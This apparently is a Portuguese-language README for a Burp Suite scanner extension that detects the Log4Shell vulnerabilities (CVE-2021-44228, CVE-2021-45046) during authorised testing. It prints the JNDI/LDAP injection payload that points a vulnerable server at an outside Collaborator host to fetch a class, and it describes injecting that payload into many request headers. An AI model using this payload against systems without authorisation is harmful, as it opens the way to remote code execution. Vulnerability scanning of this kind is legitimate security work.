
Extensão de Active Scan do Burp para identificar as vulnerabilidades Log4j CVE-2021-44228 e CVE-2021-45046
Esta extensão de Scanner Ativo do Burp Suite valida a exploração das vulnerabilidades Apache Log4j CVE-2021-44228 e CVE-2021-45046.
Esta extensão usa o Burp Collaborator para verificar o problema.
se você deseja executar apenas verificações deste módulo, pode importar o perfil extensions-only.json e selecioná-lo como o Perfil de Varredura Ativa.
Durante uma Varredura Ativa, os seguintes pontos de inserção são testados nesta extensão:
Em cada ponto de inserção, a requisição é injetada com o seguinte payload:
${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}
Além disso, esta extensão adiciona muitos cabeçalhos que estão habilitados em headers (linhas não comentadas). Estes cabeçalhos são injetados um por um em uma requisição separada.
Este projeto é feito apenas para fins educacionais e de testes éticos. O uso do Log4Shell-active-scanner para atacar alvos sem consentimento mútuo prévio é ilegal. É responsabilidade do usuário final obedecer todas as leis locais, estaduais e federais aplicáveis. Os desenvolvedores não assumem nenhuma responsabilidade e não são responsáveis por qualquer uso indevido ou dano causado por este programa.
O projeto é licenciado sob a Licença MIT.